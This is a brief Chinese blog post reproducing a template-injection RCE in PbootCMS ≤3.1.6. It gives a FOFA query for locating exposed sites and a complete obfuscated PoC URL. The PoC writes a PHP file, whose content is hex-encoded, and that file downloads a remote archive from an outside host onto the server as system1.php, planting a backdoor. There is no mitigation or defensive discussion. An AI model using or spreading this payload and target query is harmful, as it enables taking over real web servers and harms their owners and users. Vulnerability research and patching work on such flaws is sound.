PbootCMS教程|PB建站知识|CMS二次开发|网站前端教程

PbootCMS 前台RCE漏洞复现

北辰与禾 PbootCMS教程 717次

PbootCMS是全新内核且永久开源免费的PHP企业网站开发建设管理系统,是一套高效、简洁、 强悍的可免费商用的PHP CMS源码,能够满足各类企业网站开发建设的需要。

漏洞概述

PbootCMS v<=3.1.6版本中存在模板注入,攻击者可构造特定的链接利用该漏洞,执行任意代码,写入后门,获取服务器权限,进而控制整个web服务器。

复现环境

FOFA:app="PbootCMS-PHP网站开发管理系统"

PbootCMS 前台RCE漏洞复现

漏洞复现

PoC-1

/?member/login/klmns}{pboot:if(1);use/**/function/**/fputs/**/as/**/test;use/**/function/**/fopen/**/as/**/klmj0;use/**/function/**/get/**/as/**/klmj99;use/**/function/**/hex2bin/**/as/**/klmj66;test(klmj0(klmj99(‘ll‘),‘w‘),klmj66(klmj99(‘txt‘)));if(2)}{/pboot:if}&amp;amp;ll=.xsZml.php&amp;amp;txt=3C3F7068700A2461203D2022636F7079223B0A24612822687474703A2F2F7777772E677A2D6C7879792E636F6D2F7374617469632F6164646F6E732F6769742E7A6970222C2273797374656D312E70687022293B0A6563686F20276F6B313233273B

THE END

赞赏北辰与禾
微信扫一扫打赏
“北辰与禾感谢有你!”